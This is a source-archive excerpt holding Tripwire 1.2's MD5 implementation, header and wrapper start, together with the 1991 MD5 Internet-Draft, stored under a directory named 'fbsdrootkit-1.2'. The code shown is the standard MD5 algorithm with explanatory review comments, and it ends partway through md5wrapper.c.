The disclaimer from the C code has been retained, and is shown above. All big-endian/little-endian specific code in md5.c has been replaced by code that can resolve this automatically at compile-time. Tripwire specific code is in md5wrapper.c, which contains the routine 'sig_md5_get' to minimize the amount of overhead in collecting signatures from within Tripwire. (We certainly don't want to fork() for every file we need to scan!) Because of this, these files is no longer identical to the MD5 virgin distribution. I have sent my changes to the MD5 author, but I am not aware of any buybacks at this time. The original MD5 code can be found in the Internet Working Draft RFC 1321. This can be obtained via anonymous FTP (user = anonymous, password = guest) from NIC.DDN.MIL. Gene Kim September 7, 1992 fbsdrootkit-1.2/tripwire-1.2/sigs/md5/md5.c100600 764 764 24061 5474057132 15613 0ustar dfdf/* $Id: md5.c,v 1.3 1993/11/22 06:38:18 genek Exp $ */ /*********************************************************************** ** md5.c -- the source code for MD5 routines ** ** RSA Data Security, Inc. MD5 Message-Digest Algorithm ** ** Created: 2/17/90 RLR ** ** Revised: 1/91 SRD,AJ,BSK,JT Reference C Version ** ** Revised (for MD5): RLR 4/27/91 ** *********************************************************************** ** Copyright (C) 1990, RSA Data Security, Inc. All rights reserved. ** ** License to copy and use this software is granted provided that ** ** it is identified as the "RSA Data Security, Inc. MD5 Message- ** ** Digest Algorithm" in all material mentioning or referencing this ** ** software or this function. ** ** License is also granted to make and use derivative works ** ** provided that such works are identified as "derived from the RSA ** ** Data Security, Inc. MD5 Message-Digest Algorithm" in all ** ** material mentioning or referencing the derived work. ** ** RSA Data Security, Inc. 
makes no representations concerning **
 ** either the merchantability of this software or the suitability **
 ** of this software for any particular purpose. It is provided "as **
 ** is" without express or implied warranty of any kind. **
 ** These notices must be retained in any copies of any part of this **
 ** documentation and/or software. **
 **********************************************************************/

#include "md5.h"

/*
 * NOTE(review): MD5 is no longer collision resistant.  A digest computed
 * here still detects accidental change, but an integrity baseline should
 * not rely on MD5 as its only signature.
 *
 * NOTE(review): every routine below assumes UINT4 holds exactly 32 bits.
 * md5.h falls back to `unsigned long int` when TW_TYPE32 is not defined;
 * where that type is wider, the unmasked ROTATE_LEFT and the bit-count
 * carry test in MD5Update no longer behave as 32-bit arithmetic.
 * Confirm TW_TYPE32 is set for the target platform.
 */

/* forward declaration */
static void Transform ();

/* Padding block: a single 0x80 byte followed by zero bytes.  MD5Final
   feeds a prefix of this array to MD5Update. */
static unsigned char PADDING[64] = {
  0x80, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
  0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
  0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
  0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
  0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
  0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
  0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
  0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00
};

/* F, G, H and I are basic MD5 functions */
#define F(x, y, z) (((x) & (y)) | ((~x) & (z)))
#define G(x, y, z) (((x) & (z)) | ((y) & (~z)))
#define H(x, y, z) ((x) ^ (y) ^ (z))
#define I(x, y, z) ((y) ^ ((x) | (~z)))

/* ROTATE_LEFT rotates x left n bits.  Only the UNICOS variant masks x to
   32 bits before the right shift; the generic variant is a true rotate
   only when x has exactly 32 bits. */
#ifdef UNICOS
# define ROTATE_LEFT(x,n) (((x) << (n)) | (((x) & 0xffffffff) >> (32-(n))))
#else
# define ROTATE_LEFT(x, n) (((x) << (n)) | ((x) >> (32-(n))))
#endif

/* FF, GG, HH, and II transformations for rounds 1, 2, 3, and 4 */
/* Rotation is separate from addition to prevent recomputation */
/* Each macro expands to a braced block that modifies its first
   argument (a) in place: add the round function, the message word x
   and the constant ac, rotate left by s, then add b. */
#define FF(a, b, c, d, x, s, ac) \
  {(a) += F ((b), (c), (d)) + (x) + (UINT4)(ac); \
   (a) = ROTATE_LEFT ((a), (s)); \
   (a) += (b); \
  }
#define GG(a, b, c, d, x, s, ac) \
  {(a) += G ((b), (c), (d)) + (x) + (UINT4)(ac); \
   (a) = ROTATE_LEFT ((a), (s)); \
   (a) += (b); \
  }
#define HH(a, b, c, d, x, s, ac) \
  {(a) += H ((b), (c), (d)) + (x) + (UINT4)(ac); \
   (a) = ROTATE_LEFT ((a), (s)); \
   (a) += (b); \
  }
#define II(a, b, c, d, x, s, ac) \
  {(a) += I ((b), (c), (d)) + (x) + (UINT4)(ac); \
   (a) = ROTATE_LEFT ((a), (s)); \
   (a) += (b); \
  }

/* The routine MD5Init initializes the message-digest context
   mdContext: the two bit-count words i[0] and i[1] are cleared and
   buf[0..3] are loaded with the MD5 initialization constants.  The
   in[] and digest[] arrays are not touched here. */
void MD5Init (mdContext)
MD5_CTX *mdContext;
{
  mdContext->i[0] = mdContext->i[1] = (UINT4)0;

  /* Load magic initialization constants. */
  mdContext->buf[0] = (UINT4)0x67452301;
  mdContext->buf[1] = (UINT4)0xefcdab89;
  mdContext->buf[2] = (UINT4)0x98badcfe;
  mdContext->buf[3] = (UINT4)0x10325476;
}

/* The routine MD5Update updates the message-digest context to
   account for the presence of each of the characters inBuf[0..inLen-1]
   in the message whose digest is being computed.

   mdContext: context previously set up by MD5Init
   inBuf:     bytes to add to the message
   inLen:     number of bytes at inBuf

   Bytes are collected in mdContext->in; every time 64 of them have
   accumulated they are packed into sixteen words, low-order byte
   first, and passed to Transform. */
void MD5Update (mdContext, inBuf, inLen)
MD5_CTX *mdContext;
unsigned char *inBuf;
unsigned int inLen;
{
  UINT4 in[16];
  int mdi;
  unsigned int i, ii;

  /* compute number of bytes mod 64 */
  mdi = (int)((mdContext->i[0] >> 3) & 0x3F);

  /* update number of bits */
  /* i[0] is the low word and i[1] the high word of the bit count; the
     test below detects wrap-around of the low word so the carry can be
     added to the high word. */
#ifndef UNICOS
  if ((mdContext->i[0] + ((UINT4)inLen << 3)) < mdContext->i[0])
#else
  if (((mdContext->i[0]+((UINT4)inLen << 3)) & 0xffffffff) < mdContext->i[0])
#endif
    mdContext->i[1]++;
  mdContext->i[0] += ((UINT4)inLen << 3);
  /* the top three bits of inLen are lost by the << 3 above; account
     for them in the high word */
  mdContext->i[1] += ((UINT4)inLen >> 29);

  while (inLen--) {
    /* add new character to buffer, increment mdi */
    mdContext->in[mdi++] = *inBuf++;

    /* transform if necessary */
    if (mdi == 0x40) {
      for (i = 0, ii = 0; i < 16; i++, ii += 4)
        in[i] = (((UINT4)mdContext->in[ii+3]) << 24) |
                (((UINT4)mdContext->in[ii+2]) << 16) |
                (((UINT4)mdContext->in[ii+1]) << 8) |
                ((UINT4)mdContext->in[ii]);
      Transform (mdContext->buf, in);
      mdi = 0;
    }
  }
}

/* The routine MD5Final terminates the message-digest computation and
   ends with the desired message digest in mdContext->digest[0...15].

   The bit count is saved before padding, because the padding itself is
   fed through MD5Update and changes i[0]/i[1].  The context is not
   cleared afterwards, so the last buffered message bytes stay in
   mdContext->in until the caller reuses or wipes the context. */
void MD5Final (mdContext)
MD5_CTX *mdContext;
{
  UINT4 in[16];
  int mdi;
  unsigned int i, ii;
  unsigned int padLen;

  /* save number of bits */
  in[14] = mdContext->i[0];
  in[15] = mdContext->i[1];

  /* compute number of bytes mod 64 */
  mdi = (int)((mdContext->i[0] >> 3) & 0x3F);

  /* pad out to 56 mod 64 */
  padLen = (mdi < 56) ? (56 - mdi) : (120 - mdi);
  MD5Update (mdContext, PADDING, padLen);

  /* append length in bits and transform */
  /* only words 0..13 come from the buffer; in[14] and in[15] already
     hold the saved bit count */
  for (i = 0, ii = 0; i < 14; i++, ii += 4)
    in[i] = (((UINT4)mdContext->in[ii+3]) << 24) |
            (((UINT4)mdContext->in[ii+2]) << 16) |
            (((UINT4)mdContext->in[ii+1]) << 8) |
            ((UINT4)mdContext->in[ii]);
  Transform (mdContext->buf, in);

  /* store buffer in digest */
  /* each word is written low-order byte first */
  for (i = 0, ii = 0; i < 4; i++, ii += 4) {
    mdContext->digest[ii] = (unsigned char)(mdContext->buf[i] & 0xFF);
    mdContext->digest[ii+1] =
      (unsigned char)((mdContext->buf[i] >> 8) & 0xFF);
    mdContext->digest[ii+2] =
      (unsigned char)((mdContext->buf[i] >> 16) & 0xFF);
    mdContext->digest[ii+3] =
      (unsigned char)((mdContext->buf[i] >> 24) & 0xFF);
  }
}

/* Basic MD5 step. Transforms buf based on in.

   buf: the four chaining words; read at entry and incremented by the
        round results at exit
   in:  the sixteen message words of one block; only read

   The order of the 64 steps, the word indices and the constants are
   the algorithm itself and must not be rearranged. */
static void Transform (buf, in)
UINT4 *buf;
UINT4 *in;
{
  UINT4 a = buf[0], b = buf[1], c = buf[2], d = buf[3];

  /* Round 1 */
#define S11 7
#define S12 12
#define S13 17
#define S14 22
  FF ( a, b, c, d, in[ 0], S11, 0xd76aa478); /* 1 */
  FF ( d, a, b, c, in[ 1], S12, 0xe8c7b756); /* 2 */
  FF ( c, d, a, b, in[ 2], S13, 0x242070db); /* 3 */
  FF ( b, c, d, a, in[ 3], S14, 0xc1bdceee); /* 4 */
  FF ( a, b, c, d, in[ 4], S11, 0xf57c0faf); /* 5 */
  FF ( d, a, b, c, in[ 5], S12, 0x4787c62a); /* 6 */
  FF ( c, d, a, b, in[ 6], S13, 0xa8304613); /* 7 */
  FF ( b, c, d, a, in[ 7], S14, 0xfd469501); /* 8 */
  FF ( a, b, c, d, in[ 8], S11, 0x698098d8); /* 9 */
  FF ( d, a, b, c, in[ 9], S12, 0x8b44f7af); /* 10 */
  FF ( c, d, a, b, in[10], S13, 0xffff5bb1); /* 11 */
  FF ( b, c, d, a, in[11], S14, 0x895cd7be); /* 12 */
  FF ( a, b, c, d, in[12], S11, 0x6b901122); /* 13 */
  FF ( d, a, b, c, in[13], S12, 0xfd987193); /* 14 */
  FF ( c, d, a, b, in[14], S13, 0xa679438e); /* 15 */
  FF ( b, c, d, a, in[15], S14, 0x49b40821); /* 16 */

  /* Round 2 */
#define S21 5
#define S22 9
#define S23 14
#define S24 20
  GG ( a, b, c, d, in[ 1], S21, 0xf61e2562); /* 17 */
  GG ( d, a, b, c, in[ 6], S22, 0xc040b340); /* 18 */
  GG ( c, d, a, b, in[11], S23, 0x265e5a51); /* 19 */
  GG ( b, c, d, a, in[ 0], S24, 0xe9b6c7aa); /* 20 */
  GG ( a, b, c, d, in[ 5], S21, 0xd62f105d); /* 21 */
  GG ( d, a, b, c, in[10], S22, 0x2441453); /* 22 */
  GG ( c, d, a, b, in[15], S23, 0xd8a1e681); /* 23 */
  GG ( b, c, d, a, in[ 4], S24, 0xe7d3fbc8); /* 24 */
  GG ( a, b, c, d, in[ 9], S21, 0x21e1cde6); /* 25 */
  GG ( d, a, b, c, in[14], S22, 0xc33707d6); /* 26 */
  GG ( c, d, a, b, in[ 3], S23, 0xf4d50d87); /* 27 */
  GG ( b, c, d, a, in[ 8], S24, 0x455a14ed); /* 28 */
  GG ( a, b, c, d, in[13], S21, 0xa9e3e905); /* 29 */
  GG ( d, a, b, c, in[ 2], S22, 0xfcefa3f8); /* 30 */
  GG ( c, d, a, b, in[ 7], S23, 0x676f02d9); /* 31 */
  GG ( b, c, d, a, in[12], S24, 0x8d2a4c8a); /* 32 */

  /* Round 3 */
#define S31 4
#define S32 11
#define S33 16
#define S34 23
  HH ( a, b, c, d, in[ 5], S31, 0xfffa3942); /* 33 */
  HH ( d, a, b, c, in[ 8], S32, 0x8771f681); /* 34 */
  HH ( c, d, a, b, in[11], S33, 0x6d9d6122); /* 35 */
  HH ( b, c, d, a, in[14], S34, 0xfde5380c); /* 36 */
  HH ( a, b, c, d, in[ 1], S31, 0xa4beea44); /* 37 */
  HH ( d, a, b, c, in[ 4], S32, 0x4bdecfa9); /* 38 */
  HH ( c, d, a, b, in[ 7], S33, 0xf6bb4b60); /* 39 */
  HH ( b, c, d, a, in[10], S34, 0xbebfbc70); /* 40 */
  HH ( a, b, c, d, in[13], S31, 0x289b7ec6); /* 41 */
  HH ( d, a, b, c, in[ 0], S32, 0xeaa127fa); /* 42 */
  HH ( c, d, a, b, in[ 3], S33, 0xd4ef3085); /* 43 */
  HH ( b, c, d, a, in[ 6], S34, 0x4881d05); /* 44 */
  HH ( a, b, c, d, in[ 9], S31, 0xd9d4d039); /* 45 */
  HH ( d, a, b, c, in[12], S32, 0xe6db99e5); /* 46 */
  HH ( c, d, a, b, in[15], S33, 0x1fa27cf8); /* 47 */
  HH ( b, c, d, a, in[ 2], S34, 0xc4ac5665); /* 48 */

  /* Round 4 */
#define S41 6
#define S42 10
#define S43 15
#define S44 21
  II ( a, b, c, d, in[ 0], S41, 0xf4292244); /* 49 */
  II ( d, a, b, c, in[ 7], S42, 0x432aff97); /* 50 */
  II ( c, d, a, b, in[14], S43, 0xab9423a7); /* 51 */
  II ( b, c, d, a, in[ 5], S44, 0xfc93a039); /* 52 */
  II ( a, b, c, d, in[12], S41, 0x655b59c3); /* 53 */
  II ( d, a, b, c, in[ 3], S42, 0x8f0ccc92); /* 54 */
  II ( c, d, a, b, in[10], S43, 0xffeff47d); /* 55 */
  II ( b, c, d, a, in[ 1], S44, 0x85845dd1); /* 56 */
  II ( a, b, c, d, in[ 8], S41, 0x6fa87e4f); /* 57 */
  II ( d, a, b, c, in[15], S42, 0xfe2ce6e0); /* 58 */
  II ( c, d, a, b, in[ 6], S43, 0xa3014314); /* 59 */
  II ( b, c, d, a, in[13], S44, 0x4e0811a1); /* 60 */
  II ( a, b, c, d, in[ 4], S41, 0xf7537e82); /* 61 */
  II ( d, a, b, c, in[11], S42, 0xbd3af235); /* 62 */
  II ( c, d, a, b, in[ 2], S43, 0x2ad7d2bb); /* 63 */
  II ( b, c, d, a, in[ 9], S44, 0xeb86d391); /* 64 */

  /* fold this block's result into the chaining words */
  buf[0] += a;
  buf[1] += b;
  buf[2] += c;
  buf[3] += d;
}
fbsdrootkit-1.2/tripwire-1.2/sigs/md5/md5.doc100600 764 764 45257 5434607545 16155 0ustar dfdf## $Id: md5.doc,v 1.3 1993/08/19 05:28:05 genek Exp $ Network Working Group R. Rivest INTERNET-DRAFT MIT Laboratory for Computer Science S. Dusse RSA Data Security, Inc. 10 July 1991 The MD5 Message-Digest Algorithm STATUS OF THIS MEMO This draft document will be submitted to the RFC editor as a protocol specification. Comments should be sent to or to the authors. Distribution of this memo is unlimited. ACKNOWLEDGEMENT We would like to thank Don Coppersmith, Burt Kaliski, Ralph Merkle, David Chaum, and Noam Nisan for numerous helpful comments and suggestions. Table of Contents 1. Executive Summary 1 2. Terminology and Notation 2 3. MD5 Algorithm Description 3 4. Summary 7 5. Summary of Differences Between MD4 and MD5 7 6. Security Considerations 7 References 8 Authors' Addresses 8 APPENDIX - Reference Implementation 9 1. Executive Summary This document describes the MD5 message-digest algorithm. The algorithm takes as input an input message of arbitrary length and produces as output a 128-bit "fingerprint" or "message digest" of the input. It is conjectured that it is computationally infeasible to produce two messages having the same message digest, or to produce any message having a given prespecified target message digest. 
The MD5 algorithm is intended for digital signature applications, where a large file must be "compressed" in a secure manner before being encrypted with a private (secret) key under a public-key cryptosystem such as RSA. Rivest and Dusse [Page 1] INTERNET-DRAFT The MD5 Message-Digest Algorithm 10 July 1991 The MD5 algorithm is designed to be quite fast on 32-bit machines. In addition, the MD5 algorithm does not require any large substitution tables; the algorithm can be coded quite compactly. The MD5 algorithm is an extension of the MD4 message digest algorithm [1,2]. MD5 is slightly slower than MD4, but is more "conservative" in design. MD5 was designed because it was felt that MD4 was perhaps being adopted for use more quickly than justified by the existing critical review; because MD4 was designed to be exceptionally fast, it is "at the edge" in terms of risking successful cryptanalytic attack. MD5 backs off a bit, giving up a little in speed for a much greater likelihood of ultimate security. It incorporates some suggestions made by various reviewers, and contains additional optimizations. The MD5 algorithm is being placed in the public domain for review and possible adoption as a standard. A version of this document including the C source code in the appendix is available by FTP from RSA.COM in the file "pub/md5.doc". This document may be referred to, unofficially, as Internet draft [MD5-A]. For OSI-based applications, MD5's object identifier is md5 OBJECT IDENTIFIER ::= {iso(1) member-body(2) US(840) rsadsi(113549) digestAlgorithm(2) 5} In the X.509 type AlgorithmIdentifier [3], the parameters for MD5 should have type NULL. 2. Terminology and Notation In this document a "word" is a 32-bit quantity and a "byte" is an eight-bit quantity. A sequence of bits can be interpreted in a natural manner as a sequence of bytes, where each consecutive group of eight bits is interpreted as a byte with the high-order (most significant) bit of each byte listed first. 
Similarly, a sequence of bytes can be interpreted as a sequence of 32-bit words, where each consecutive group of four bytes is interpreted as a word with the low-order (least significant) byte given first. Let x_i denote "x sub i". If the subscript is an expression, we surround it in braces, as in x_{i+1}. Similarly, we use ^ for superscripts (exponentiation), so that x^i denotes x to the i-th power. Let the symbol "+" denote addition of words (i.e., modulo-2^32 addition). Let X <<< s denote the 32-bit value obtained by circularly shifting (rotating) X left by s bit positions. Let not(X) denote the Rivest and Dusse [Page 2] INTERNET-DRAFT The MD5 Message-Digest Algorithm 10 July 1991 bit-wise complement of X, and let X v Y denote the bit-wise OR of X and Y. Let X xor Y denote the bit-wise XOR of X and Y, and let XY denote the bit-wise AND of X and Y. 3. MD5 Algorithm Description We begin by supposing that we have a b-bit message as input, and that we wish to find its message digest. Here b is an arbitrary nonnegative integer; b may be zero, it need not be a multiple of eight, and it may be arbitrarily large. We imagine the bits of the message written down as follows: m_0 m_1 ... m_{b-1} The following five steps are performed to compute the message digest of the message. 3.1 Step 1. Append Padding Bits The message is "padded" (extended) so that its length (in bits) is congruent to 448, modulo 512. That is, the message is extended so that it is just 64 bits shy of being a multiple of 512 bits long. Padding is always performed, even if the length of the message is already congruent to 448, modulo 512 (in which case 512 bits of padding are added). Padding is performed as follows: a single "1" bit is appended to the message, and then enough zero bits are appended so that the length in bits of the padded message becomes congruent to 448, modulo 512. 3.2 Step 2. 
Append Length

A 64-bit representation of b (the length of the message before the padding bits were added) is appended to the result of the previous step. In the unlikely event that b is greater than 2^64, then only the low-order 64 bits of b are used. (These bits are appended as two 32-bit words and appended low-order word first in accordance with the previous conventions.)

At this point the resulting message (after padding with bits and with b) has a length that is an exact multiple of 512 bits. Equivalently, this message has a length that is an exact multiple of 16 (32-bit) words. Let M[0 ... N-1] denote the words of the resulting message, where N is a multiple of 16.

Rivest and Dusse [Page 3] INTERNET-DRAFT The MD5 Message-Digest Algorithm 10 July 1991

3.3 Step 3. Initialize MD Buffer

A four-word buffer (A,B,C,D) is used to compute the message digest. Here each of A, B, C, D is a 32-bit register. These registers are initialized to the following values (in hexadecimal, low-order bytes first):

    word A: 01 23 45 67
    word B: 89 ab cd ef
    word C: fe dc ba 98
    word D: 76 54 32 10

3.4 Step 4. Process Message in 16-Word Blocks

We first define four auxiliary functions that each take as input three 32-bit words and produce as output one 32-bit word.

    F(X,Y,Z) = XY v not(X) Z
    G(X,Y,Z) = XZ v Y not(Z)
    H(X,Y,Z) = X xor Y xor Z
    I(X,Y,Z) = Y xor (X v not(Z))

In each bit position F acts as a conditional: if X then Y else Z. (The function F could have been defined using + instead of v since XY and not(X)Z will never have 1's in the same bit position.) It is interesting to note that if the bits of X, Y, and Z are independent and unbiased, then each bit of F(X,Y,Z) will be independent and unbiased. 
The functions G, H, and I are similar to the function F, in that they act in "bitwise parallel" to produce their output from the bits of X, Y, and Z, in such a manner that if the corresponding bits of X, Y, and Z are independent and unbiased, then each bit of G(X,Y,Z), H(X,Y,Z), and I(X,Y,Z) will be independent and unbiased. Note that the function H is the bit-wise "xor" or "parity" function of its inputs. Do the following: /* Process each 16-word block. */ For i = 0 to N/16-1 do /* Copy block i into X. */ For j = 0 to 15 do Set X[j] to M[i*16+j]. end /* of loop on j */ /* Save A as AA, B as BB, C as CC, and D as DD. */ AA = A BB = B CC = C Rivest and Dusse [Page 4] INTERNET-DRAFT The MD5 Message-Digest Algorithm 10 July 1991 DD = D /* Round 1. */ /* Let FF(a,b,c,d,X[k],s,t) denote the operation a = b + ((a + F(b,c,d) + X[k] + t) <<< s). */ /* Here the additive constants t are chosen as follows: In step i, the additive constant is the integer part of 4294967296 times abs(sin(i)), where i is in radians. */ /* Let S11 = 7, S12 = 12, S13 = 17, and S14 = 22. */ /* Do the following 16 operations. */ FF (a, b, c, d, X[ 0], S11, 3614090360); /* Step 1 */ FF (d, a, b, c, X[ 1], S12, 3905402710); /* 2 */ FF (c, d, a, b, X[ 2], S13, 606105819); /* 3 */ FF (b, c, d, a, X[ 3], S14, 3250441966); /* 4 */ FF (a, b, c, d, X[ 4], S11, 4118548399); /* 5 */ FF (d, a, b, c, X[ 5], S12, 1200080426); /* 6 */ FF (c, d, a, b, X[ 6], S13, 2821735955); /* 7 */ FF (b, c, d, a, X[ 7], S14, 4249261313); /* 8 */ FF (a, b, c, d, X[ 8], S11, 1770035416); /* 9 */ FF (d, a, b, c, X[ 9], S12, 2336552879); /* 10 */ FF (c, d, a, b, X[10], S13, 4294925233); /* 11 */ FF (b, c, d, a, X[11], S14, 2304563134); /* 12 */ FF (a, b, c, d, X[12], S11, 1804603682); /* 13 */ FF (d, a, b, c, X[13], S12, 4254626195); /* 14 */ FF (c, d, a, b, X[14], S13, 2792965006); /* 15 */ FF (b, c, d, a, X[15], S14, 1236535329); /* 16 */ /* Round 2. 
*/ /* Let GG(a,b,c,d,X[k],s,t) denote the operation a = b + ((a + G(b,c,d) + X[k] + t) <<< s). */ /* Let S21 = 5, S22 = 9, S23 = 14, and S24 = 20. */ /* Do the following 16 operations. */ GG (a, b, c, d, X[ 1], S21, 4129170786); /* 17 */ GG (d, a, b, c, X[ 6], S22, 3225465664); /* 18 */ GG (c, d, a, b, X[11], S23, 643717713); /* 19 */ GG (b, c, d, a, X[ 0], S24, 3921069994); /* 20 */ GG (a, b, c, d, X[ 5], S21, 3593408605); /* 21 */ GG (d, a, b, c, X[10], S22, 38016083); /* 22 */ GG (c, d, a, b, X[15], S23, 3634488961); /* 23 */ GG (b, c, d, a, X[ 4], S24, 3889429448); /* 24 */ GG (a, b, c, d, X[ 9], S21, 568446438); /* 25 */ GG (d, a, b, c, X[14], S22, 3275163606); /* 26 */ GG (c, d, a, b, X[ 3], S23, 4107603335); /* 27 */ GG (b, c, d, a, X[ 8], S24, 1163531501); /* 28 */ GG (a, b, c, d, X[13], S21, 2850285829); /* 29 */ GG (d, a, b, c, X[ 2], S22, 4243563512); /* 30 */ GG (c, d, a, b, X[ 7], S23, 1735328473); /* 31 */ GG (b, c, d, a, X[12], S24, 2368359562); /* 32 */ /* Round 3. */ /* Let HH(a,b,c,d,X[k],s,t) denote the operation Rivest and Dusse [Page 5] INTERNET-DRAFT The MD5 Message-Digest Algorithm 10 July 1991 a = b + ((a + H(b,c,d) + X[k] + t) <<< s). */ /* Let S31 = 4, S32 = 11, S33 = 16, and S34 = 23. */ /* Do the following 16 operations. 
*/ HH (a, b, c, d, X[ 5], S31, 4294588738); /* 33 */ HH (d, a, b, c, X[ 8], S32, 2272392833); /* 34 */ HH (c, d, a, b, X[11], S33, 1839030562); /* 35 */ HH (b, c, d, a, X[14], S34, 4259657740); /* 36 */ HH (a, b, c, d, X[ 1], S31, 2763975236); /* 37 */ HH (d, a, b, c, X[ 4], S32, 1272893353); /* 38 */ HH (c, d, a, b, X[ 7], S33, 4139469664); /* 39 */ HH (b, c, d, a, X[10], S34, 3200236656); /* 40 */ HH (a, b, c, d, X[13], S31, 681279174); /* 41 */ HH (d, a, b, c, X[ 0], S32, 3936430074); /* 42 */ HH (c, d, a, b, X[ 3], S33, 3572445317); /* 43 */ HH (b, c, d, a, X[ 6], S34, 76029189); /* 44 */ HH (a, b, c, d, X[ 9], S31, 3654602809); /* 45 */ HH (d, a, b, c, X[12], S32, 3873151461); /* 46 */ HH (c, d, a, b, X[15], S33, 530742520); /* 47 */ HH (b, c, d, a, X[ 2], S34, 3299628645); /* 48 */ /* Round 4. */ /* Let II(a,b,c,d,X[k],s,t) denote the operation a = b + ((a + I(b,c,d) + X[k] + t) <<< s). */ /* Let S41 = 6, S42 = 10, S43 = 15, and S44 = 21. */ /* Do the following 16 operations. */ II (a, b, c, d, X[ 0], S41, 4096336452); /* 49 */ II (d, a, b, c, X[ 7], S42, 1126891415); /* 50 */ II (c, d, a, b, X[14], S43, 2878612391); /* 51 */ II (b, c, d, a, X[ 5], S44, 4237533241); /* 52 */ II (a, b, c, d, X[12], S41, 1700485571); /* 53 */ II (d, a, b, c, X[ 3], S42, 2399980690); /* 54 */ II (c, d, a, b, X[10], S43, 4293915773); /* 55 */ II (b, c, d, a, X[ 1], S44, 2240044497); /* 56 */ II (a, b, c, d, X[ 8], S41, 1873313359); /* 57 */ II (d, a, b, c, X[15], S42, 4264355552); /* 58 */ II (c, d, a, b, X[ 6], S43, 2734768916); /* 59 */ II (b, c, d, a, X[13], S44, 1309151649); /* 60 */ II (a, b, c, d, X[ 4], S41, 4149444226); /* 61 */ II (d, a, b, c, X[11], S42, 3174756917); /* 62 */ II (c, d, a, b, X[ 2], S43, 718787259); /* 63 */ II (b, c, d, a, X[ 9], S44, 3951481745); /* 64 */ /* Then perform the following additions. (That is, increment each of the four registers by the value it had before this block was started.) 
*/ A = A + AA B = B + BB C = C + CC D = D + DD Rivest and Dusse [Page 6] INTERNET-DRAFT The MD5 Message-Digest Algorithm 10 July 1991 end /* of loop on i */ 3.5 Step 5. Output The message digest produced as output is A, B, C, D. That is, we begin with the low-order byte of A, and end with the high-order byte of D. This completes the description of MD5. A reference implementation in C is given in the Appendix. 4. Summary The MD5 message-digest algorithm is simple to implement, and provides a "fingerprint" or message digest of a message of arbitrary length. It is conjectured that the difficulty of coming up with two messages having the same message digest is on the order of 2^64 operations, and that the difficulty of coming up with any message having a given message digest is on the order of 2^128 operations. The MD5 algorithm has been carefully scrutinized for weaknesses. It is, however, a relatively new algorithm and further security analysis is of course justified, as is the case with any new proposal of this sort. 5. Summary of Differences Between MD4 and MD5 The following are the differences between MD4 and MD5: -- A fourth round has been added. -- Each step now has a unique additive constant. -- The function g in round 2 was changed from (XY v XZ v YZ) to (XZ v Y not(Z)) to make g less symmetric. -- Each step now adds in the result of the previous step. This promotes a faster "avalanche effect". -- The order in which input words are accessed in rounds 2 and 3 is changed, to make these patterns less like each other. -- The shift amounts in each round have been approximately optimized, to yield a faster "avalanche effect". The shifts in different rounds are distinct. Rivest and Dusse [Page 7] INTERNET-DRAFT The MD5 Message-Digest Algorithm 10 July 1991 6. 
Security Considerations The level of security discussed in this memo is considered to be sufficient for implementing very high security hybrid digital- signature schemes based on MD5 and a public-key cryptosystem. References [1] Rivest, R.L., The MD4 Message Digest Algorithm (RFC 1186), October 1990. [2] Rivest, R.L., The MD4 message digest algorithm, presented at CRYPTO '90 (Santa Barbara, CA, August 11-15, 1990). [3] CCITT, The Directory---Authentication Framework (Recommendation X.509), 1988. Authors' Addresses Ronald L. Rivest Massachusetts Institute of Technology Laboratory for Computer Science NE43-324 545 Technology Square Cambridge, MA 02139-1986 Phone: (617) 253-5880 EMail: rivest@theory.lcs.mit.edu Steve Dusse RSA Data Security, Inc. 10 Twin Dolphin Drive Redwood City, CA 94065 Phone: (415) 595-8782 EMail: dusse@rsa.com Rivest and Dusse [Page 8] INTERNET-DRAFT The MD5 Message-Digest Algorithm 10 July 1991 APPENDIX - Reference Implementation This appendix contains the following files: md5.h -- header file for implementation of MD5 md5.c -- the source code for MD5 routines md5driver.c -- sample test routines session -- sample results of running md5driver It is not difficult to improve this implementation on particular platforms, an exercise left to the reader. Following are some suggestions: 1. Change MD5Update so that the context is not used at all if it is empty (mdi == 0) and 64 or more bytes remain (inLen >= 64). In other words, call Transform with inBuf in this case. (This requires that byte ordering is correct in inBuf.) 2. Implement a procedure MD5UpdateLong modeled after MD5Update where inBuf is UINT4 * instead of unsigned char *. MD5UpdateLong would call Transform directly with 16- word blocks from inBuf. Call this instead of MD5Update in general. This works well if you have an I/O procedure that can read long words from a file. 3. 
On "little-endian" platforms where the lowest-address byte in a long word is the least significant (and there are no alignment restrictions), change MD5Update to call Transform directly with 64-byte blocks from inBuf (typecast to a UINT4 *). Rivest and Dusse [Page 9] INTERNET-DRAFT The MD5 Message-Digest Algorithm 10 July 1991 fbsdrootkit-1.2/tripwire-1.2/sigs/md5/md5.h100600 764 764 2163 5611466376 15606 0ustar dfdf/*********************************************************************** ** md5.h -- header file for implementation of MD5 ** ** RSA Data Security, Inc. MD5 Message-Digest Algorithm ** ** Created: 2/17/90 RLR ** ** Revised: 12/27/90 SRD,AJ,BSK,JT Reference C version ** ** Revised (for MD5): RLR 4/27/91 ** **********************************************************************/ /* $Id: md5.h,v 1.5 1994/07/15 11:03:26 gkim Exp $ */ /* typedef a 32-bit type */ #ifdef TW_TYPE32 typedef unsigned TW_TYPE32 UINT4; #else typedef unsigned long int UINT4; #endif /* Data structure for MD5 (Message-Digest) computation */ typedef struct { UINT4 i[2]; /* number of _bits_ handled mod 2^64 */ UINT4 buf[4]; /* scratch buffer */ unsigned char in[64]; /* input buffer */ unsigned char digest[16]; /* actual digest after MD5Final call */ } MD5_CTX; void MD5Init(); void MD5Update(); void MD5Final(); int sig_md5_get(); fbsdrootkit-1.2/tripwire-1.2/sigs/md5/md5wrapper.c100600 764 764 3760 5614757143 17204 0ustar dfdf#ifndef lint static char rcsid[] = "$Id: md5wrapper.c,v 1.10 1994/07/25 15:46:43 gkim Exp $"; #endif /* * md5wrapper.c * * signature function hook for MD5 (the RSA Data Security, Inc. MD5 * Message Digesting Algorithm) for Tripwire. * * The original MD5 code is contained in md5.c in its entirety. 
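*
 * Gene Kim
 * Purdue University
 * September 27, 1992
 */

#include "../../include/config.h"
#include
#include
#ifdef STDLIBH
#include
#include
#endif
#ifdef STRINGH
#include
#else
#include
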